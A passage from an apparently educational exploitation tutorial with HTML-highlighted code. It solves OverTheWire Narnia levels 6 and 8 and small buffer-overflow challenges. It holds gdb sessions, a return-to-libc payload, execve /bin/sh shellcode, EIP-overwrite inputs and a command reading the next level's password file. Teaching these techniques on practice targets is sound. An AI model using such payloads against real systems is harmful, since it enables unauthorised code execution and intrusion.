    <span class="k">for</span><span class="p">(</span><span class="n">i</span><span class="o">=</span><span class="mi">3</span><span class="p">;</span> <span class="n">argv</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">!=</span> <span class="n">NULL</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
        <span class="n">memset</span><span class="p">(</span><span class="n">argv</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="s1">&#39;</span><span class="se">\0</span><span class="s1">&#39;</span><span class="p">,</span> <span class="n">strlen</span><span class="p">(</span><span class="n">argv</span><span class="p">[</span><span class="n">i</span><span class="p">]));</span>

    <span class="n">strcpy</span><span class="p">(</span><span class="n">b1</span><span class="p">,</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]);</span>
    <span class="n">strcpy</span><span class="p">(</span><span class="n">b2</span><span class="p">,</span><span class="n">argv</span><span class="p">[</span><span class="mi">2</span><span class="p">]);</span>
    <span class="o">//</span><span class="k">if</span><span class="p">(((</span><span class="n">unsigned</span> <span class="n">long</span><span class="p">)</span><span class="n">fp</span> <span class="o">&amp;</span> <span class="mh">0xff000000</span><span class="p">)</span> <span class="o">==</span> <span class="mh">0xff000000</span><span class="p">)</span>
    <span class="k">if</span><span class="p">(((</span><span class="n">unsigned</span> <span class="n">long</span><span class="p">)</span><span class="n">fp</span> <span class="o">&amp;</span> <span class="mh">0xff000000</span><span class="p">)</span> <span class="o">==</span> <span class="n">get_sp</span><span class="p">())</span>
        <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
    <span class="n">fp</span><span class="p">(</span><span class="n">b1</span><span class="p">);</span>

    <span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
<span class="p">}</span>
</pre></div>
</div>
<p>Stack is not executable for this binary. This binary is an example of “return-to-libc” attack is a computer security attack usually starting with a buffer overflow in which a subroutine return address on a call stack is replaced by an address of a subroutine that is already present in the process’ executable memory, rendering the NX bit feature useless (if present) and ridding the attacker of the need to inject their own code.</p>
<div class="highlight-default"><div class="highlight"><pre><span></span>gdb -q narnia6
Reading symbols from /home/bitvijays/narnia6...(no debugging symbols found)...done.
gdb-peda$ checksec
CANARY    : disabled
FORTIFY   : disabled
NX        : ENABLED
PIE       : disabled
RELRO     : disabled
gdb-peda$
</pre></div>
</div>
<p>Let&#8217;s compile the source on the local and check what happens:</p>
<div class="highlight-default"><div class="highlight"><pre><span></span><span class="n">gcc</span> <span class="o">-</span><span class="n">m32</span> <span class="o">-</span><span class="n">ggdb</span> <span class="o">-</span><span class="n">fno</span><span class="o">-</span><span class="n">stack</span><span class="o">-</span><span class="n">protector</span> <span class="o">-</span><span class="n">Wall</span> <span class="n">narnia6</span><span class="o">.</span><span class="n">c</span> <span class="o">-</span><span class="n">o</span> <span class="n">narnia61</span>
</pre></div>
</div>
<p>If you see carefully, we passed A<em>8 + BBBB + &#8221; &#8221; + &#8220;C&#8221;</em>8 + DDDD, which resulted in</p>
<div class="highlight-default"><div class="highlight"><pre><span></span>gdb -q ./narnia61
gdb-peda$ pdisass main
Dump of assembler code for function main:
   0x080486d2 &lt;+330&gt;:   call   0x8048450 &lt;exit@plt&gt;
   0x080486d7 &lt;+335&gt;:   lea    eax,[esp+0x20]
   0x080486db &lt;+339&gt;:   mov    DWORD PTR [esp],eax
   0x080486de &lt;+342&gt;:   mov    eax,DWORD PTR [esp+0x28]
   0x080486e2 &lt;+346&gt;:   call   eax
   0x080486e4 &lt;+348&gt;:   mov    DWORD PTR [esp],0x1
   0x080486eb &lt;+355&gt;:   call   0x8048450 &lt;exit@plt&gt;
End of assembler dump.
gdb-peda$ br *main+346
Breakpoint 1 at 0x80486e2: file narnia6.c, line 48.
gdb-peda$ run `python -c &#39;print &quot;A&quot;*8 + &quot;BBBB&quot; + &quot; &quot; + &quot;C&quot;*8 + &quot;DDDD&quot;&#39;`
[-------------------------------------code-------------------------------------]
   0x80486d7 &lt;main+335&gt;:    lea    eax,[esp+0x20]
   0x80486db &lt;main+339&gt;:    mov    DWORD PTR [esp],eax
   0x80486de &lt;main+342&gt;:    mov    eax,DWORD PTR [esp+0x28]
=&gt; 0x80486e2 &lt;main+346&gt;:    call   eax
   0x80486e4 &lt;main+348&gt;:    mov    DWORD PTR [esp],0x1
   0x80486eb &lt;main+355&gt;:    call   0x8048450 &lt;exit@plt&gt;
   0x80486f0 &lt;__libc_csu_fini&gt;: push   ebp
   0x80486f1 &lt;__libc_csu_fini+1&gt;:   mov    ebp,esp
Guessed arguments:
arg[0]: 0xffffd380 (&quot;DDDD&quot;)
Breakpoint 1, 0x080486e2 in main (argc=0x3, argv=0xffffd444) at narnia6.c:48
48      fp(b1);
gdb-peda$ p b1
$1 = &quot;DDDD\000AAA&quot;
gdb-peda$ p b2
$2 = &quot;CCCCCCCC&quot;
gdb-peda$ p puts
$3 = {&lt;text variable, no debug info&gt;} 0xf7eb3360 &lt;puts&gt;
gdb-peda$ p system
$4 = {&lt;text variable, no debug info&gt;} 0xf7e8bc30 &lt;system&gt;
gdb-peda$ p &amp;b1
$5 = (char (*)[8]) 0xffffd380
gdb-peda$ x/50xw 0xffffd350
0xffffd360: 0xffffd380  0xffffd5df  0x0000003b  0x0804874b
0xffffd370: 0x00000003  0xffffd444  0x43434343  0x43434343
0xffffd380: 0x44444444  0x41414100  0x42424242  0x00000000
0xffffd390: 0x08048700  0xf7fb0ff4  0xffffd418  0xf7e66e46
0xffffd3a0: 0x00000003  0xffffd444  0xffffd454  0xf7fde860
gdb-peda$ p fp
$6 = (int (*)(char *)) 0x42424242
gdb-peda$ p &amp;fp
$7 = (int (**)(char *)) 0xffffd388
gdb-peda$ p $fp
$8 = (void *) 0xffffd398
</pre></div>
</div>
<p>The address of fp &#8220;p &amp;fp&#8221; is 0xffffd3888 which has a value of (&#8220;p fp&#8221;) 0x42424242. As previously the stack is NoteXecutable, but stdlib.h is included in the C Program. Stdlib.h includes system call which has an address of (&#8220;p system&#8221;) 0xf7e8bc30. Further DDDD overwrites AAAA with the Null byte.</p>
<div class="highlight-default"><div class="highlight"><pre><span></span>narnia6@melinda:/narnia$ ./narnia6 `python -c &#39;print &quot;A&quot;*8 + &quot;\x40\x1c\xe6\xf7&quot; + &quot; &quot; + &quot;C&quot;*8 + &quot;/bin/sh&quot;&#39;`
$ cat /etc/narnia_pass/narnia7
</pre></div>
</div>
</div></blockquote>
<ul class="simple">
<li>Let&#8217;s see another example where we have to use a environment variable to invoke a shell Narnia8.</li>
</ul>
<blockquote>
<div><div class="code c highlight-default"><div class="highlight"><pre><span></span><span class="c1">#include &lt;stdio.h&gt;</span>
<span class="c1">#include &lt;stdlib.h&gt;</span>
<span class="c1">#include &lt;string.h&gt;</span>
<span class="o">//</span> <span class="n">gcc</span><span class="s1">&#39;s variable reordering fucked things up</span>
<span class="o">//</span> <span class="n">to</span> <span class="n">keep</span> <span class="n">the</span> <span class="n">level</span> <span class="ow">in</span> <span class="n">its</span> <span class="n">old</span> <span class="n">style</span> <span class="n">i</span> <span class="n">am</span>
<span class="o">//</span> <span class="n">making</span> <span class="s2">&quot;i&quot;</span> <span class="k">global</span> <span class="n">unti</span> <span class="n">i</span> <span class="n">find</span> <span class="n">a</span> <span class="n">fix</span>
<span class="o">//</span> <span class="o">-</span><span class="n">morla</span>
<span class="nb">int</span> <span class="n">i</span><span class="p">;</span>

<span class="n">void</span> <span class="n">func</span><span class="p">(</span><span class="n">char</span> <span class="o">*</span><span class="n">b</span><span class="p">){</span>
    <span class="n">char</span> <span class="o">*</span><span class="n">blah</span><span class="o">=</span><span class="n">b</span><span class="p">;</span>
    <span class="n">char</span> <span class="n">bok</span><span class="p">[</span><span class="mi">20</span><span class="p">];</span>
    <span class="o">//</span><span class="nb">int</span> <span class="n">i</span><span class="o">=</span><span class="mi">0</span><span class="p">;</span>

    <span class="n">memset</span><span class="p">(</span><span class="n">bok</span><span class="p">,</span> <span class="s1">&#39;</span><span class="se">\0</span><span class="s1">&#39;</span><span class="p">,</span> <span class="n">sizeof</span><span class="p">(</span><span class="n">bok</span><span class="p">));</span>
    <span class="k">for</span><span class="p">(</span><span class="n">i</span><span class="o">=</span><span class="mi">0</span><span class="p">;</span> <span class="n">blah</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">!=</span> <span class="s1">&#39;</span><span class="se">\0</span><span class="s1">&#39;</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
        <span class="n">bok</span><span class="p">[</span><span class="n">i</span><span class="p">]</span><span class="o">=</span><span class="n">blah</span><span class="p">[</span><span class="n">i</span><span class="p">];</span>

    <span class="n">printf</span><span class="p">(</span><span class="s2">&quot;</span><span class="si">%s</span><span class="se">\n</span><span class="s2">&quot;</span><span class="p">,</span><span class="n">bok</span><span class="p">);</span>
<span class="p">}</span>

<span class="nb">int</span> <span class="n">main</span><span class="p">(</span><span class="nb">int</span> <span class="n">argc</span><span class="p">,</span> <span class="n">char</span> <span class="o">**</span><span class="n">argv</span><span class="p">){</span>

    <span class="k">if</span><span class="p">(</span><span class="n">argc</span> <span class="o">&gt;</span> <span class="mi">1</span><span class="p">)</span>
        <span class="n">func</span><span class="p">(</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]);</span>
    <span class="k">else</span>
    <span class="n">printf</span><span class="p">(</span><span class="s2">&quot;</span><span class="si">%s</span><span class="s2"> argument</span><span class="se">\n</span><span class="s2">&quot;</span><span class="p">,</span> <span class="n">argv</span><span class="p">[</span><span class="mi">0</span><span class="p">]);</span>

    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</pre></div>
</div>
<p>Let&#8217;s see what is happening here: for loop in function func copies data from blah to bok character array until a null character is found. Let&#8217;s see how the stack would look like</p>
<div class="highlight-default"><div class="highlight"><pre><span></span><span class="o">&lt;</span><span class="n">bok</span> <span class="n">character</span> <span class="n">array</span><span class="o">&gt;&lt;</span><span class="n">blah</span> <span class="n">pointer</span><span class="o">&gt;&lt;</span><span class="n">fp</span><span class="o">&gt;&lt;</span><span class="n">ret</span><span class="o">&gt;&lt;</span><span class="n">pointer</span> <span class="n">b</span><span class="o">&gt;</span>
</pre></div>
</div>
<p>Let&#8217;s confirm this by using gdb? We put an breakpoint on printf function in the func function.</p>
<div class="highlight-default"><div class="highlight"><pre><span></span><span class="mh">0xffffd670</span><span class="p">:</span> <span class="mh">0x08048580</span>  <span class="mh">0xffffd688</span>  <span class="mh">0x00000014</span>  <span class="mh">0xf7e54f53</span>
<span class="mh">0xffffd680</span><span class="p">:</span> <span class="mh">0x00000000</span>  <span class="mh">0x00ca0000</span>  <span class="mh">0x41414141</span>  <span class="mh">0x41414141</span>
<span class="mh">0xffffd690</span><span class="p">:</span> <span class="mh">0x41414141</span>  <span class="mh">0x41414141</span>  <span class="mh">0x00414141</span>  <span class="mh">0xffffd8b1</span>
<span class="mh">0xffffd6a0</span><span class="p">:</span> <span class="mh">0x00000002</span>  <span class="mh">0xffffd764</span>  <span class="mh">0xffffd6c8</span>  <span class="mh">0x080484cd</span>
<span class="mh">0xffffd6b0</span><span class="p">:</span> <span class="mh">0xffffd8b1</span>  <span class="mh">0xf7ffd000</span>  <span class="mh">0x080484fb</span>  <span class="mh">0xf7fca000</span>
</pre></div>
</div>
<p>Address 0xffffd689 marks the start of the character buffer bok. I entered 19 A so it&#8217;s 0x41 19 times followed by null 0x00. Followed by that is 0xffffd8b1 (Value of Blah pointer). Followed by fp 12 bytes &lt;0x00000002 0xffffd764 0xffffd6c8&gt;. Followed by 0x080484cd which is the return address</p>
<div class="highlight-default"><div class="highlight"><pre><span></span><span class="p">(</span><span class="n">gdb</span><span class="p">)</span> <span class="n">x</span><span class="o">/</span><span class="n">s</span> <span class="mh">0x080484cd</span>
<span class="mh">0x80484cd</span> <span class="o">&lt;</span><span class="n">main</span><span class="o">+</span><span class="mi">31</span><span class="o">&gt;</span><span class="p">:</span>    <span class="s2">&quot;</span><span class="se">\353\025\213</span><span class="s2">E</span><span class="se">\f\213</span><span class="s2">&quot;</span>
</pre></div>
</div>
<p>followed by pointer b (0xffffd8b1). Let&#8217;s see what&#8217;s at location 0xffffd8b1</p>
<div class="highlight-default"><div class="highlight"><pre><span></span><span class="p">(</span><span class="n">gdb</span><span class="p">)</span> <span class="n">x</span><span class="o">/</span><span class="mi">20</span><span class="n">wx</span> <span class="mh">0xffffd8b1</span>
<span class="mh">0xffffd8b1</span><span class="p">:</span> <span class="mh">0x41414141</span>  <span class="mh">0x41414141</span>  <span class="mh">0x41414141</span>  <span class="mh">0x41414141</span>
<span class="mh">0xffffd8c1</span><span class="p">:</span> <span class="mh">0x00414141</span>  <span class="mh">0x5f474458</span>  <span class="mh">0x53534553</span>  <span class="mh">0x5f4e4f49</span>
</pre></div>
</div>
<p>Let&#8217;s see what happens when we try to enter more than the 19 character (buffer size of bok - 1 byte (for null character))</p>
<div class="highlight-default"><div class="highlight"><pre><span></span>narnia8@melinda:/narnia$ ./narnia8 `python -c &#39;print &quot;A&quot;*20&#39;`
AAAAAAAAAAAAAAAAAAAA����
narnia8@melinda:/narnia$ ./narnia8 `python -c &#39;print &quot;A&quot;*20&#39;` | hexdump
0000000 4141 4141 4141 4141 4141 4141 4141 4141
0000010 4141 4141 d8bf ffff 0a02
000001a
</pre></div>
</div>
<p>As expected, we get A followed by some garbage. which is the address where blah is pointing. We know that we can overwrite the RET address by</p>
<div class="highlight-default"><div class="highlight"><pre><span></span><span class="c1"># `python -c &#39;print &quot;A&quot;*20 + &quot;\x90\x90\x90\x90&quot; + &quot;A&quot;*12 + &quot;BBBB&quot;&#39;`</span>
</pre></div>
</div>
<p>Let&#8217;s see what happens when we do this. After copying 20 A it copies x90 and makes blah pointer from 0xffffd8bf to 0xffffd890. Because of the for loop</p>
<div class="highlight-default"><div class="highlight"><pre><span></span><span class="k">for</span><span class="p">(</span><span class="n">i</span><span class="o">=</span><span class="mi">0</span><span class="p">;</span> <span class="n">blah</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">!=</span> <span class="s1">&#39;</span><span class="se">\0</span><span class="s1">&#39;</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
</pre></div>
</div>
<p>It now copies the character from 0xffffd890 reference i.e 0xffffd890 + i value. Suppose it copied the character 0x41. The address becomes 0xffff4190 and now for loop searches from that address until a null character is found.</p>
<div class="highlight-default"><div class="highlight"><pre><span></span>(gdb) x/20xw $esp
0xffffd660: 0xffffd678  0x00000000  0x00000014  0xf7e54f53
0xffffd670: 0x00000000  0x00ca0000  0x41414141  0x41414141
0xffffd680: 0x41414141  0x41414141  0x41414141  0xffffd890
0xffffd690: 0x00000002  0xffffd754  0xffffd6b8  0x080484cd
0xffffd6a0: 0xffffd89c  0xf7ffd000  0x080484fb  0xf7fca000

(gdb) x/10xw 0xffffd890
0xffffd890: 0x2f61696e  0x6e72616e  0x00386169  0x41414141
0xffffd8a0: 0x41414141  0x41414141  0x41414141  0x41414141
0xffffd8b0: 0x90909090  0x41414141

(gdb) x/20xw $esp
0xffffd660: 0x08048580  0xffffd678  0x00000014  0xf7e54f53
0xffffd670: 0x00000000  0x00ca0000  0x41414141  0x41414141
0xffffd680: 0x41414141  0x41414141  0x41414141  0xffff4190
0xffffd690: 0x00000002  0xffffd754  0xffffd6b8  0x080484cd
0xffffd6a0: 0xffffd89c  0xf7ffd000  0x080484fb  0xf7fca000

(gdb) x/10xw 0xffff4190
0xffff4190: 0x00000000  0x00000000  0x00000000  0x00000000
0xffff41a0: 0x00000000  0x00000000  0x00000000  0x00000000
0xffff41b0: 0x00000000  0x00000000
</pre></div>
</div>
<p>If we can somehow keep/change the blah pointer back to it&#8217;s original value we may overwrite the RET pointer (after 12 bytes). Let&#8217;s see how 0xffffd89c looks when is used</p>
<div class="highlight-default"><div class="highlight"><pre><span></span>`python -c &#39;print &quot;A&quot;*20 + &quot;\x90\x90\x90\x90&quot; + &quot;A&quot;*12 + &quot;BBBB&quot;&#39;`
</pre></div>
</div>
<div class="highlight-default"><div class="highlight"><pre><span></span><span class="p">(</span><span class="n">gdb</span><span class="p">)</span> <span class="n">x</span><span class="o">/</span><span class="mi">30</span><span class="n">xw</span> <span class="mh">0xffffd89c</span>
<span class="mh">0xffffd89c</span><span class="p">:</span> <span class="mh">0x41414141</span>  <span class="mh">0x41414141</span>  <span class="mh">0x41414141</span>  <span class="mh">0x41414141</span>
<span class="mh">0xffffd8ac</span><span class="p">:</span> <span class="mh">0x41414141</span>  <span class="mh">0x90909090</span>  <span class="mh">0x41414141</span>  <span class="mh">0x41414141</span>
<span class="mh">0xffffd8bc</span><span class="p">:</span> <span class="mh">0x41414141</span>  <span class="mh">0x42424242</span>  <span class="mh">0x47445800</span>  <span class="mh">0x5345535f</span>
</pre></div>
</div>
<p>When we used the below with the address, we were able to overwrite the RET by BBBB. Now, we control the EIP :)</p>
<div class="highlight-default"><div class="highlight"><pre><span></span>(gdb) run `python -c &#39;print &quot;A&quot;*20 + &quot;\x9c\xd8\xff\xff&quot; + &quot;A&quot;*12 + &quot;BBBB&quot;&#39;`


(gdb) x/20xw $esp
0xffffd660: 0x08048580  0xffffd678  0x00000014  0xf7e54f53
0xffffd670: 0x00000000  0x00ca0000  0x41414141  0x41414141
0xffffd680: 0x41414141  0x41414141  0x41414141  0xffffd89c
0xffffd690: 0x41414141  0x41414141  0x41414141  0x42424242
</pre></div>
</div>
<p>Let&#8217;s export a shellcode using a environment variable check it&#8217;s address on the stack and redirect the flow of our code to it. Notice the number of NOPs we have put for easy identification plus reachability.</p>
<div class="highlight-default"><div class="highlight"><pre><span></span>export EGG=`python -c &#39;print &quot;\x90&quot;*90 + &quot;\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80&quot;&#39;`
</pre></div>
</div>
<p>Searching our environment variable we get it at address 0xffffd8d4.</p>
<div class="highlight-default"><div class="highlight"><pre><span></span>(gdb) x/100xw $esp+500
0xffffd7e4: 0x0000000f  0xffffd80b  0x00000000  0x00000000
0xffffd7f4: 0x00000000  0xde000000  0x1a2a5992  0xf11444ea
0xffffd804: 0x11433cf3  0x694a71a2  0x00363836  0x672f0000
0xffffd814: 0x73656d61  0x72616e2f  0x2f61696e  0x6e72616e
0xffffd824: 0x00386169  0x41414141  0x41414141  0x41414141
0xffffd834: 0x41414141  0x41414141  0xffffd828  0x41414141
0xffffd844: 0x41414141  0x41414141  0x42424242  0x47445800
0xffffd854: 0x5345535f  0x4e4f4953  0x3d44495f  0x35343239
0xffffd864: 0x45485300  0x2f3d4c4c  0x2f6e6962  0x68736162
0xffffd874: 0x52455400  0x74783d4d  0x006d7265  0x5f485353
0xffffd884: 0x45494c43  0x353d544e  0x34392e39  0x2e31362e
0xffffd894: 0x20343731  0x37373835  0x32322032  0x48535300
0xffffd8a4: 0x5954545f  0x65642f3d  0x74702f76  0x31312f73
0xffffd8b4: 0x5f434c00  0x3d4c4c41  0x47450043  0x90903d47
0xffffd8c4: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffd8d4: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffd8e4: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffd8f4: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffd904: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffd914: 0x90909090  0x90909090  0x99580b6a  0x2f2f6852
0xffffd924: 0x2f686873  0x896e6962  0xcdc931e3  0x53550080
0xffffd934: 0x6e3d5245  0x696e7261  0x4c003861  0x4f435f53
0xffffd944: 0x53524f4c  0x3d73723d  0x69643a30  0x3b31303d
</pre></div>
</div>
<p>Let&#8217;s redirect our program to 0xffffd8d4 to get the shell</p>
<div class="highlight-default"><div class="highlight"><pre><span></span>(gdb) run `python -c &#39;print &quot;A&quot;*20 + &quot;\x28\xd8\xff\xff&quot; + &quot;A&quot;*12 + &quot;\xd4\xd8\xff\xff&quot;&#39;`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /games/narnia/narnia8 `python -c &#39;print &quot;A&quot;*20 + &quot;\x28\xd8\xff\xff&quot; + &quot;A&quot;*12 + &quot;\xd4\xd8\xff\xff&quot;&#39;`

Breakpoint 1, 0x080484a7 in func ()
(gdb) c
Continuing.
AAAAAAAAAAAAAAAAAAAA(���AAAAAAAAAAAA����(���
process 19900 is executing new program: /bin/dash
Error in re-setting breakpoint 1: No symbol table is loaded.  Use the &quot;file&quot; command.
Error in re-setting breakpoint 1: No symbol &quot;func&quot; in current context.
Error in re-setting breakpoint 1: No symbol &quot;func&quot; in current context.
Error in re-setting breakpoint 1: No symbol &quot;func&quot; in current context.
$
</pre></div>
</div>
<p>Trying this without gdb didn&#8217;t work because the address of character array changes</p>
<div class="highlight-default"><div class="highlight"><pre><span></span>narnia8@melinda:/narnia$ ./narnia8 `python -c &#39;print &quot;A&quot;*20 + &quot;\x28\xd8\xff\xff&quot; + &quot;B&quot;*12 + &quot;\xd4\xd8\xff\xff&quot;&#39;`
AAAAAAAAAAAAAAAAAAAA(A��
narnia8@melinda:/narnia$ ./narnia8 `python -c &#39;print &quot;A&quot;*20 + &quot;\x28\xd8\xff\xff&quot; + &quot;B&quot;*12 + &quot;\xd4\xd8\xff\xff&quot;&#39;` | hexdump
0000000 4141 4141 4141 4141 4141 4141 4141 4141
0000010 4141 4141 4128 ffff 0a02
000001a
</pre></div>
</div>
<p>Changing 28 to 0a just by chance gave me the correct address to be pointed at</p>
<div class="highlight-default"><div class="highlight"><pre><span></span>narnia8@melinda:/narnia$ ./narnia8 `python -c &#39;print &quot;A&quot;*20 + &quot;\x0a\xd8\xff\xff&quot; + &quot;B&quot;*12 + &quot;\xd4\xd8\xff\xff&quot;&#39;` | hexdump
0000000 4141 4141 4141 4141 4141 4141 4141 4141
0000010 4141 4141 d837 ffff 0a03
</pre></div>
</div>
<div class="highlight-default"><div class="highlight"><pre><span></span>narnia8@melinda:/narnia$ ./narnia8 `python -c &#39;print &quot;A&quot;*20 + &quot;\x37\xd8\xff\xff&quot; + &quot;B&quot;*12 + &quot;\xd4\xd8\xff\xff&quot;&#39;`
AAAAAAAAAAAAAAAAAAAA7���BBBBBBBBBBBB����7���
$
</pre></div>
</div>
<p>For example, below you need the address of secret to write the new value 0x1337beef.</p>
<div class="code c highlight-default"><div class="highlight"><pre><span></span><span class="n">unsigned</span> <span class="n">secret</span> <span class="o">=</span> <span class="mh">0xdeadbeef</span><span class="p">;</span>

<span class="nb">int</span> <span class="n">main</span><span class="p">(</span><span class="nb">int</span> <span class="n">argc</span><span class="p">,</span> <span class="n">char</span> <span class="o">**</span><span class="n">argv</span><span class="p">){</span>
    <span class="n">unsigned</span> <span class="o">*</span><span class="n">ptr</span><span class="p">;</span>
    <span class="n">unsigned</span> <span class="n">value</span><span class="p">;</span>
    <span class="n">char</span> <span class="n">key</span><span class="p">[</span><span class="mi">33</span><span class="p">];</span>
    <span class="n">FILE</span> <span class="o">*</span><span class="n">f</span><span class="p">;</span>
    <span class="n">printf</span><span class="p">(</span><span class="s2">&quot;Welcome! I will grant you one arbitrary write!</span><span class="se">\n</span><span class="s2">&quot;</span><span class="p">);</span>
    <span class="n">printf</span><span class="p">(</span><span class="s2">&quot;Where do you want to write to? &quot;</span><span class="p">);</span>
    <span class="n">scanf</span><span class="p">(</span><span class="s2">&quot;%p&quot;</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">ptr</span><span class="p">);</span>
    <span class="n">printf</span><span class="p">(</span><span class="s2">&quot;Okay! What do you want to write there? &quot;</span><span class="p">);</span>
    <span class="n">scanf</span><span class="p">(</span><span class="s2">&quot;%p&quot;</span><span class="p">,</span> <span class="p">(</span><span class="n">void</span> <span class="o">**</span><span class="p">)</span><span class="o">&amp;</span><span class="n">value</span><span class="p">);</span>
    <span class="n">printf</span><span class="p">(</span><span class="s2">&quot;Writing %p to %p...</span><span class="se">\n</span><span class="s2">&quot;</span><span class="p">,</span> <span class="p">(</span><span class="n">void</span> <span class="o">*</span><span class="p">)</span><span class="n">value</span><span class="p">,</span> <span class="p">(</span><span class="n">void</span> <span class="o">*</span><span class="p">)</span><span class="n">ptr</span><span class="p">);</span>
    <span class="o">*</span><span class="n">ptr</span> <span class="o">=</span> <span class="n">value</span><span class="p">;</span>
    <span class="n">printf</span><span class="p">(</span><span class="s2">&quot;Value written!</span><span class="se">\n</span><span class="s2">&quot;</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">secret</span> <span class="o">==</span> <span class="mh">0x1337beef</span><span class="p">){</span>
        <span class="n">printf</span><span class="p">(</span><span class="s2">&quot;Woah! You changed my secret!</span><span class="se">\n</span><span class="s2">&quot;</span><span class="p">);</span>
        <span class="n">printf</span><span class="p">(</span><span class="s2">&quot;I guess this means you get a flag now...</span><span class="se">\n</span><span class="s2">&quot;</span><span class="p">);</span>

        <span class="n">f</span> <span class="o">=</span> <span class="n">fopen</span><span class="p">(</span><span class="s2">&quot;flag.txt&quot;</span><span class="p">,</span> <span class="s2">&quot;r&quot;</span><span class="p">);</span>
        <span class="n">fgets</span><span class="p">(</span><span class="n">key</span><span class="p">,</span> <span class="mi">32</span><span class="p">,</span> <span class="n">f</span><span class="p">);</span>
        <span class="n">fclose</span><span class="p">(</span><span class="n">f</span><span class="p">);</span>
        <span class="n">puts</span><span class="p">(</span><span class="n">key</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
    <span class="p">}</span>
    <span class="n">printf</span><span class="p">(</span><span class="s2">&quot;My secret is still safe! Sorry.</span><span class="se">\n</span><span class="s2">&quot;</span><span class="p">);</span>
<span class="p">}</span>
</pre></div>
</div>
</div></blockquote>
<ul class="simple">
<li>In another challenge below, It can be easily seen the value of secret can be changed after entering 16 characters + 0xc0deface. As, 0xc0deface can&#8217;t be printed as ASCII characters, you can use python to pass the input.</li>
</ul>
<blockquote>
<div><div class="highlight-default"><div class="highlight"><pre><span></span><span class="n">python</span> <span class="o">-</span><span class="n">c</span> <span class="s1">&#39; print &quot;A&quot; * 16 + &quot;</span><span class="se">\xc0\xde\xfa\xce</span><span class="s1">&quot;&#39;</span> <span class="ow">or</span> <span class="n">python</span> <span class="o">-</span><span class="n">c</span> <span class="s1">&#39; print &quot;A&quot; * 16 + &quot;</span><span class="se">\xce\xfa\xde\xc0</span><span class="s1">&quot;&#39;</span> <span class="n">based</span> <span class="n">on</span> <span class="n">the</span> <span class="n">endianess</span> <span class="n">of</span> <span class="n">the</span> <span class="n">system</span><span class="o">.</span>
</pre></div>
</div>
<div class="code C highlight-default"><div class="highlight"><pre><span></span><span class="n">void</span> <span class="n">give_shell</span><span class="p">(){</span>
     <span class="n">gid</span>\<span class="n">_t</span> <span class="n">gid</span> <span class="o">=</span> <span class="n">getegid</span><span class="p">();</span>
     <span class="n">setresgid</span><span class="p">(</span><span class="n">gid</span><span class="p">,</span> <span class="n">gid</span><span class="p">,</span><span class="n">gid</span><span class="p">);</span>
     <span class="n">system</span><span class="p">(</span><span class="s2">&quot;/bin/sh -i&quot;</span><span class="p">);</span> <span class="p">}</span>

<span class="n">void</span> <span class="n">vuln</span><span class="p">(</span><span class="n">char</span> \<span class="o">*</span><span class="nb">input</span><span class="p">){</span>
     <span class="n">char</span> <span class="n">buf</span><span class="p">[</span><span class="mi">16</span><span class="p">];</span>
     <span class="nb">int</span> <span class="n">secret</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
     <span class="n">strcpy</span><span class="p">(</span><span class="n">buf</span><span class="p">,</span><span class="nb">input</span><span class="p">);</span>

 <span class="k">if</span> <span class="p">(</span><span class="n">secret</span> <span class="o">==</span> <span class="mh">0xc0deface</span><span class="p">){</span>
     <span class="n">give_shell</span><span class="p">();</span>
 <span class="p">}</span><span class="k">else</span><span class="p">{</span>
     <span class="n">printf</span><span class="p">(</span><span class="s2">&quot;The secret is </span><span class="si">%x</span><span class="se">\n</span><span class="s2">&quot;</span><span class="p">,</span> <span class="n">secret</span><span class="p">);</span>
 <span class="p">}</span>

<span class="p">}</span>

<span class="nb">int</span> <span class="n">main</span><span class="p">(</span><span class="nb">int</span> <span class="n">argc</span><span class="p">,</span> <span class="n">char</span> \<span class="o">*</span>\<span class="o">*</span><span class="n">argv</span><span class="p">)</span>
<span class="p">{</span> <span class="k">if</span> <span class="p">(</span><span class="n">argc</span> <span class="o">&gt;</span> <span class="mi">1</span><span class="p">)</span>
     <span class="n">vuln</span><span class="p">(</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]);</span>
     <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span>
</pre></div>
</div>
</div></blockquote>
<ul class="simple">
<li>Controlling the EIP: In the below challenge, an attacker can use a buffer overflow to take control of the program&#8217;s execution. the return address for the call to vuln function is above buf on the stack, so it can be overwritten with an overflow. this allows an attacker to put nearly any address they desire in place of the return address. in this example, the goal is to call the give_shell function.</li>
</ul>
<blockquote>
<div><ul class="simple">
<li>We need to find the address of give_shell function which can be done either by using gdb and print give_shell or objdump -d outputfile | grep give_shell.</li>
<li>To know the EIP offset, you can use cyclic patterns. Use pattern_create.rb and pattern_offset.rb So pattern_create.rb 100 for instance will create a 100 byte cyclic pattern.</li>
<li>Then you feed this as your input to the vulnerable program and it will crash. so get the value of EIP at that point.</li>
<li>Then, we just need to pass the input to the program by</li>
</ul>
<blockquote>
